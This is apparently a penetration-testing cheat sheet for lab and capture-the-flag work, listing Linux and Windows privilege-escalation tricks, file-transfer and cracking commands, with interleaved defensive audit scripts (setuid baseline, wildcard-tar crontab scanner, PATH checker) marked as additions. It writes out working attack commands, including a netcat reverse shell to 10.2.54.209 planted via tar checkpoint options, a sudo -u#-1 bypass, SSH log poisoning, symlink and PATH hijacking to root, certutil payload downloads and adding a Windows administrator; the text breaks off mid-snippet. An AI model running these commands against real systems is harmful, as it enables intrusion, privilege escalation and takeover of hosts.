# Linux
### Stabilize Shell
1. ctrl+z
2. stty raw -echo
3. fg (press enter x2)
4. export TERM=xterm (so that `clear` and other terminal-aware commands work)
### Spawn bash
* /usr/bin/script -qc /bin/bash /dev/null
* python -c 'import pty;pty.spawn("/bin/bash")'
* python3 -c 'import pty;pty.spawn("/bin/bash")'
### Vulnerable sudo (ALL,!root)
`sudo -u#-1 whoami`
`sudo -u#-1 `
### Execute as different user
`sudo -u `
### FTP
Connect to the FTP service on the machine
`ftp user `
After logging in successfully you can download all files in the current directory with
`mget *`
Download files recursively
`wget -r ftp://user:pass@/`
### SMB Shares
#### SmbClient
* `smbclient -L \\\\\\` list the shares anonymously
* `smbclient \\\\10.10.209.122\\ -U ` access a share as an authorized user
#### Smbmap
* `smbmap -u -p -H `
#### Smbget
* `smbget -R smb:///`
### NFS shares
* `showmount -e ` lists the NFS shares exported by the host
* `mount -t nfs :/` mounts that share
### Cronjobs
* cronjobs for specific users are stored in `/var/spool/cron/cronjobs/`
* `crontab -u -e` edit the cronjobs of a specific user (`-l` instead of `-e` lists them)
* `crontab -l` cronjob for the current user
* `cat /etc/crontab` system wide cronjobs
### Finding Binaries
* find . -perm /4000 (setuid, SUID)
* find . -perm /2000 (setgid, SGID)
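The two `find` commands above are the attacker's inventory; the defender's version of the same search is a baseline that is saved once and diffed on every run, so that a setuid or setgid file that appears later (a dropped copy of a shell, for instance) stands out. The script below is an added example, not part of the original cheat sheet; the function names and the constructed temporary directory in `demo_setid` are mine, and `-perm -4000 -o -perm -2000` is the POSIX spelling of the `-perm /4000` / `-perm /2000` used above.

```shell
#!/bin/sh
# Added example: baseline-and-diff audit of setuid/setgid files.
# Not from the original cheat sheet; function names are my own.

# Print the setuid/setgid regular files under ROOT, one path per line, sorted.
# -perm -4000 / -perm -2000 is the POSIX spelling of the cheat sheet's
# "find . -perm /4000" and "find . -perm /2000".
find_setid() {
    root="$1"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Save the current list as a baseline file (run once on a known-good host).
save_setid_baseline() {
    find_setid "$1" > "$2"
}

# Print setuid/setgid files present now but absent from BASELINE.
# A new entry on a host that should not change is worth an alert.
new_setid() {
    baseline="$1"; root="$2"
    find_setid "$root" | comm -13 "$baseline" -
}

# Demo on a constructed directory so the script runs anywhere.
demo_setid() {
    d=$(mktemp -d)
    : > "$d/legit";   chmod 4755 "$d/legit"    # present when the baseline is taken
    : > "$d/plain";   chmod 0755 "$d/plain"    # no setid bit, never listed
    save_setid_baseline "$d" "$d.baseline"
    : > "$d/dropped"; chmod 2755 "$d/dropped"  # appears after the baseline
    echo "new setid files since baseline:"
    new_setid "$d.baseline" "$d"               # prints only .../dropped
    rm -rf "$d" "$d.baseline"
}
demo_setid
```

Run the baseline step on a freshly built host and schedule `new_setid` from cron or a monitoring agent; an empty result is the expected state.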
### Finding File capabilities
`getcap -r / 2>/dev/null`
### Finding text in files
`grep -rnw '/path/to/somewhere/' -e 'pattern'`
### Changing file attributes
chattr +i filename `make file immutable`
chattr -i filename `make file mutable again`
lsattr filename `check file attributes`
### Uploading Files
scp file/you/want user@ip:/path/to/store `copy a file to the remote host`
python -m SimpleHTTPServer [port] `By default will listen on 8000`
python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files
`wget http://:port/`
### Netcat to download files from target
`nc -l -p [port] > file` Receive file
`nc -w 3 [ip] [port] < file` Send file
### Cracking Zip Archive
`fcrackzip -u -D -p `
### Decrypting PGP key
If you have an `asc` key file that is used for PGP authentication, then
* gpg2john key.asc > asc_hash
* john asc_hash --wordlist=path_to_wordlist
#### With the pgp CLI
* pgp --import key.asc
* pgp --decrypt file.pgp
#### With the gpg CLI
* gpg --import key.asc
* gpg --decrypt file.pgp
### Killing a running job in the same shell
`jobs`
```
Find its job number
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
```
### SSH Port Forwarding
`ssh -L :localhost:@`
### SSH auth log poisoning
Log in as any user to see that the attempt gets logged, then try to log in with malicious PHP code as the username
`ssh ''@192.168.43.2`
Then `http://ip/page?a=whoami;`
### Getting root with ln (symlink)
If we have permission to run /usr/bin/ln as root we can own the machine
```
echo 'bash' > root
chmod +x root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
```
### Tar Exploitation
Whenever you see a cronjob running a command like `cd //andre/backup tar -zcf //filetar.gz *`, go to the folder the backup is created from and run these commands in that directory
```
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
```
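The trick above works only because the cron job hands tar a bare `*`, which the shell expands into file names that tar then reads as options. The defender's side is twofold: write backup jobs so tar never sees a glob, and scan existing crontabs for the pattern. The script below is an added example, not part of the cheat sheet; `safe_tar`, `flag_wildcard_tar`, `count_wildcard_tar` and the sample crontab lines in `CRON_SAMPLE` are mine and constructed for the demo, and the compression flag is left out so only `tar` itself is needed.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): the defender's side of the
# tar wildcard trick above. Function names and the sample crontab are mine.

# Archive SRC into OUT without ever passing a shell glob to tar:
# "-C SRC ." makes tar enumerate the directory itself, so a file named
# "--checkpoint-action=exec=..." is stored as an entry, never parsed
# as an option. (Compression flag left out so only tar is required.)
safe_tar() {
    src="$1"; out="$2"
    tar -cf "$out" -C "$src" .
}

# Constructed crontab lines, one per style of tar invocation.
CRON_SAMPLE='# constructed sample, not a real crontab
*/5 * * * * root cd /home/example/backup && tar -zcf /var/backups/site.tgz *
0 2 * * * root cd /srv/www && tar -cf /var/backups/www.tar ./*
0 3 * * * root tar -cf /var/backups/etc.tar -C /etc .
30 3 * * * root cd /opt/data && tar -czf /var/backups/data.tgz -- *'

# Read crontab-style lines on stdin and print those that hand tar a bare "*".
# "./*" and "-- *" are left alone: both stop tar from reading a file name as
# an option. Returns 0 even when nothing is flagged.
flag_wildcard_tar() {
    grep -E 'tar[^#]*[[:space:]]\*([[:space:]]|$)' \
        | grep -Ev '[[:space:]]--[[:space:]]+\*' || true
}

# Number of flagged lines in the string $1, for scripting.
count_wildcard_tar() {
    printf '%s\n' "$1" | flag_wildcard_tar | grep -c '' || true
}

demo_tar() {
    d=$(mktemp -d)
    : > "$d/data.txt"
    : > "$d/--checkpoint=1"                 # name copied from the trick above
    : > "$d/--checkpoint-action=exec=true"  # harmless command stands in for shell.sh
    safe_tar "$d" "$d.tar"
    echo "archive entries (option-like names stored as files):"
    tar -tf "$d.tar"
    echo "flagged crontab lines:"
    printf '%s\n' "$CRON_SAMPLE" | flag_wildcard_tar
    rm -rf "$d" "$d.tar"
}
demo_tar
```

Feed `flag_wildcard_tar` the output of `cat /etc/crontab /etc/cron.d/*` (and each user's `crontab -l`) to find jobs that need rewriting; only the first sample line is flagged, the other three forms are safe.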
### Binary Exploits
If a binary runs a command by name only (for example `date`) instead of by absolute path, we can create our own `date` that runs `/bin/bash` and prepend its directory to PATH so that ours gets executed
`export PATH=/:$PATH`
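PATH hijacking of this kind needs two things the defender controls: a PATH entry the attacker can write to, and a program that calls its helpers by bare name. The script below is an added example, not part of the cheat sheet; `writable_path_dirs` audits a PATH string for empty, relative, missing or group/world-writable entries, and `safe_date` shows the hardened calling pattern (fixed PATH plus absolute path). Function names and the constructed directory in `demo_path` are mine.

```shell
#!/bin/sh
# Added example (not from the cheat sheet): audit a PATH string for entries
# someone could plant a fake "date" in. Function names are mine.

# Print one line per risky entry in the PATH-style string $1:
#   empty or relative entries (resolve against the current directory),
#   missing directories (whoever can create them owns that PATH slot),
#   directories writable by group or others.
writable_path_dirs() {
    # Subshell so the IFS and glob settings do not leak to the caller.
    (
        IFS=':'
        set -f
        for d in $1; do
            case "$d" in
                "")  echo "relative(empty=cwd): $d" ;;
                /*)
                    if [ ! -d "$d" ]; then
                        echo "missing: $d"
                    else
                        mode=$(ls -ld -- "$d" | cut -c1-10)
                        case "$mode" in
                            ?????w????|????????w?) echo "writable-by-others($mode): $d" ;;
                        esac
                    fi ;;
                *)   echo "relative: $d" ;;
            esac
        done
    )
}

# Hardened pattern for scripts, cron jobs and setuid helpers: pin PATH and
# call the binary by absolute path, so a prepended directory changes nothing.
safe_date() {
    PATH=/usr/bin:/bin /bin/date -u +%Y
}

demo_path() {
    d=$(mktemp -d); chmod 0777 "$d"   # constructed world-writable entry
    echo "risky entries in $d:/no/such/dir:/usr/bin"
    writable_path_dirs "$d:/no/such/dir:/usr/bin"
    echo "year from the pinned call: $(safe_date)"
    rmdir "$d"
}
demo_path
```

Run `writable_path_dirs "$PATH"` as the account that executes the cron job or service; `/usr/bin` produces no output because it is root-owned and not writable by others.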
### Enumeration
* cat /etc/*release
* cat /etc/issue
* uname -a
* lsb_release -a
* Running Linpeas
* ss -tulpn (listening TCP/UDP ports on the machine, with the owning process)
# Windows
### Adding User
net user "USER_NAME" "PASS" /add
### Changing User's password
net user "USER_NAME" "NEWPASS"
### Adding User to Administrators
net localgroup administrators "USER_NAME" /add
### Changing File Permissions
CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1. R `Read`
2. W `Write`
3. C `Change`
4. F `Full Control`
### Set File bits
attrib +r filename `add read only bit`
attrib -r filename `remove read only bit`
attrib +h filename `add hidden bit`
attrib -h filename `remove hidden bit`
### Show hidden file/folder
dir /a `show all hidden files & folder`
dir /a:d `show only hidden folder`
dir /a:h `show only hidden files`
### Downloading Files
`certutil.exe -urlcache -f http://:/ output.exe`
`powershell -c "wget http://:/ -OutFile output.exe"`
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath`
### Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module
### List Drives
`wmic logicaldisk get caption`
### Decrypting PSCredential Object
* $file = Import-Clixml -Path
* $file.GetNetworkCredential().username
* $file.GetNetworkCredential().password
# Msfvenom
### List All Payloads
msfvenom -l payloads
### List Payload Format
msfvenom --list formats
# Meterpreter
### Adding user for RDP
run getgui -u [USER_NAME] -p [PASS]
# Git
### Dumping repository
`./gitdumper.sh `
### Extracting information from repository
`./extractor.sh `
# Web
### XSS to RCE
```
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: